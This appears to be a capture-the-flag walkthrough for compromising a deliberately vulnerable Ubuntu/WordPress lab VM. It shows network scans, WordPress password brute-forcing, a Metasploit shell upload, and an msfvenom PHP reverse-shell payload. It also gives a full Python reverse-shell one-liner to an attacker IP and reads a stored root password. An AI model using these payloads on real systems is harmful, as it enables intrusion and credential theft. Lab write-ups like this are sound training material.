[*]
1. Find host: nmap -sn 172.16.16.0/24
MAC Address: 08:00:27:3D:EC:D7 (Oracle VirtualBox virtual NIC)
Nmap scan report for 172.16.16.31
Host is up (0.00027s latency).
MAC Address: 08:00:27:98:59:34 (Oracle VirtualBox virtual NIC)
Nmap scan report for 172.16.16.4
Host is up.
[*]
2. Scan host: nmap 172.16.16.31
Not shown: 993 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
53/tcp  open  domain
80/tcp  open  http
110/tcp open  pop3
139/tcp open  netbios-ssn
143/tcp open  imap
445/tcp open  microsoft-ds
[*]
3. Version scan: nmap 172.16.16.31 -sV -p 22,53,80,110,139,143,445
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
53/tcp  open  domain      ISC BIND 9.10.3-P4 (Ubuntu Linux)
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
110/tcp open  pop3        Dovecot pop3d
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
MAC Address: 08:00:27:98:59:34 (Oracle VirtualBox virtual NIC)
Service Info: Host: UBUNTU-EXTERMELY-VULNERABLE-M4CH1INE; OS: Linux; CPE: cpe:/o:linux:linux_kernel
[*]
4. Web enumeration: nikto -h 172.16.16.31
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server may leak inodes via ETags, header found with file /, inode: 2a45, size: 5964d0a414860, mtime: gzip
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ /info.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
[*]
5. exploit RFI: 
  generate payload: msfvenom -p php/reverse_php LHOST=172.16.16.4 LPORT=4444 -f raw -o ~/shell.php
  start webserver: python -m SimpleHTTPServer 80
  start listner: nc -nvlp 4444
  kickoff RFI: curl --url http://172.16.16.31/info.php?file=http://172.16.16.4/shell.php
**got 200 OK, but no shell, and no file download
[*]
6. Default apache page artifact: you can find me at /wordpress/ im vulnerable webapp :)
[*]
7. Find wordpress page.: http://172.16.16.31/wordpress/. I realized the page wouldn't load because all links are to <a href=192.168.56.103*
[*]
8. IP tables to re-direct 192.168.56.103 to 172.16.16.31
iptables -t nat -A OUTPUT -d 192.168.56.103 -j DNAT --to-destination 172.16.16.31
[*]
9. Wordpress scan: wpscan --url http://172.16.16.31/wordpress
i] It seems like you have not updated the database for some time
[i] Last database update: 2019-12-13
[?] Do you want to update now? [Y]es  [N]o  [A]bort update, default: [N] > Y
[i] Updating the Database ...
[i] Update completed
[+] URL: http://172.16.16.31/wordpress/
[+] Started: Sat Dec 28 16:45:53 2019

[+] Interesting header: LINK: <http://192.168.56.103/wordpress/index.php/wp-json/>; rel="https://api.w.org/"
[+] Interesting header: SERVER: Apache/2.4.18 (Ubuntu)
[+] XML-RPC Interface available under: http://172.16.16.31/wordpress/xmlrpc.php   [HTTP 405]
[+] Found an RSS Feed: http://192.168.56.103/wordpress/index.php/feed/   [HTTP 200]
[!] Detected 1 user from RSS feed:
+-----------------+
| Name            |
+-----------------+
| c0rrupt3d_brain |
+-----------------+
[!] Upload directory has directory listing enabled: http://172.16.16.31/wordpress/wp-content/uploads/
[!] Includes directory has directory listing enabled: http://172.16.16.31/wordpress/wp-includes/

[+] Enumerating WordPress version ...

[+] WordPress version 5.2.4 (Released on 2019-10-14) identified from meta generator, links opml
[!] 3 vulnerabilities identified from the version number

[!] Title: WordPress <= 5.3 - Improper Access Controls
    Reference: https://wpvulndb.com/vulnerabilities/9973
    Reference: https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20043
[i] Fixed in: 5.2.5

[!] Title: WordPress <= 5.3 - Stored XSS via Crafted Links
    Reference: https://wpvulndb.com/vulnerabilities/9975
    Reference: https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20042
[i] Fixed in: 5.2.5

[!] Title: WordPress <= 5.3 - Stored XSS via Block Editor Content
    Reference: https://wpvulndb.com/vulnerabilities/9976
    Reference: https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/
    Reference: https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-pg4x-64rh-3c9v
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16781
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16780
[i] Fixed in: 5.2.5

[+] WordPress theme in use: twentynineteen - v1.4

[+] Name: twentynineteen - v1.4
 |  Latest version: 1.4 (up to date)
 |  Last updated: 2019-11-12T00:00:00.000Z
 |  Location: http://172.16.16.31/wordpress/wp-content/themes/twentynineteen/
 |  Readme: http://172.16.16.31/wordpress/wp-content/themes/twentynineteen/readme.txt
 |  Style URL: http://172.16.16.31/wordpress/wp-content/themes/twentynineteen/style.css
 |  Referenced style.css: http://192.168.56.103/wordpress/wp-content/themes/twentynineteen/style.css
 |  Theme Name: Twenty Nineteen
 |  Theme URI: https://wordpress.org/themes/twentynineteen/
 |  Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom ...
 |  Author: the WordPress team
 |  Author URI: https://wordpress.org/

[+] Name: photo-gallery - v1.5.34
 |  Last updated: 2019-12-25T14:22:00.000Z
 |  Location: http://172.16.16.31/wordpress/wp-content/plugins/photo-gallery/
 |  Readme: http://172.16.16.31/wordpress/wp-content/plugins/photo-gallery/readme.txt
[!] The version is out of date, the latest version is 1.5.41
[!] Directory listing is enabled: http://172.16.16.31/wordpress/wp-content/plugins/photo-gallery/

[!] Title: Photo Gallery by 10Web < 1.5.35 - SQL Injection & XSS
    Reference: https://wpvulndb.com/vulnerabilities/9872
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16117
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16118
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16119
[i] Fixed in: 1.5.35



[+] Finished: Sat Dec 28 16:45:57 2019
[+] Elapsed time: 00:00:03
[+] Requests made: 80
[+] Memory used: 28.762 MB
[*]
10. Poked around wordpress blog and found hit/artifict:
im extremely vulnerable web-app and host is full of bugs. you can brute force me i have bad password set .. you can run wpscan against me to reveal juicy info about vulnerable plugins
[*]
11. This means found plugin vulnerabilities has to be the way to go.
background bruteforce: wpscan --url http://172.16.16.31/wordpress --username=c0rrupt3d_brain --threads 50 --wordlist=/usr/share/wordlists/rockyou.txt
stored xss attack: **Authenticated cross-site scripting (XSS) in WordPress block editor (within dashboard) **
[!] ERROR: We received an unknown response for login: c0rrupt3d_brain and password: 24992499
**has to be the password.** I found a weird re-direct hidden in the POST request.
[*]
12. Upload reverse shell: exploit/unix/webapp/wp_admin_shell_upload
msfconsole
use exploit/unix/webapp/wp_admin_shell_upload
set TARGETURI /wordpress
set LHOST 172.16.16.4
set LPORT 4444
set RHOST 172.16.16.31
set USERNAME c0rrupt3d_brain
set PASSWORD 24992499
exploit
**metsploit says exploit failed, but i ran a packet capture, and the webserver accepts the request
/wordpress/wp-admin/plugin-install.php?tab=upload
--_Part_1010_1918966599_4146726258
Content-Disposition: form-data; name="pluginzip"; filename="rIGjFCEUEB.zip"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary

HTTP/1.1 200 OK
Date: Sat, 28 Dec 2019 23:58:21 GMT
Server: Apache/2.4.18 (Ubuntu)
Expires: Wed, 11 Jan 1984 05:00:00 GMT
[*]
13. Have to manually execute this with wordpwn.py
./wordpwn.py 172.16.16.4 4444 Y
[*]
14. install plugin at: http://192.168.56.103/wordpress/wp-admin/plugin-install.php **for some reason it's hardcoded to 192.168.56.103**
[*]
15. Kick off shell at: http://192.168.56.103/wordpress/wp-content/plugins/malicous/wetw0rk_maybe.php
[*]
16. Found artifact from shell at /home/root3r
cat .root_password_ssh.txt
willy26
[*]
17. Get new shell: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.16.16.4",123));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
[*]
18. Attempt login for root3r: su - root3r. Found no passwd entry for user
[*]
19. Attempted to login via ssh as rooter, no luck.
[*]
20. su - root: willy26
[*]
21. Get flag!
cat proof.txt
voila you have successfully pwned me :) !!!
:D
[*]




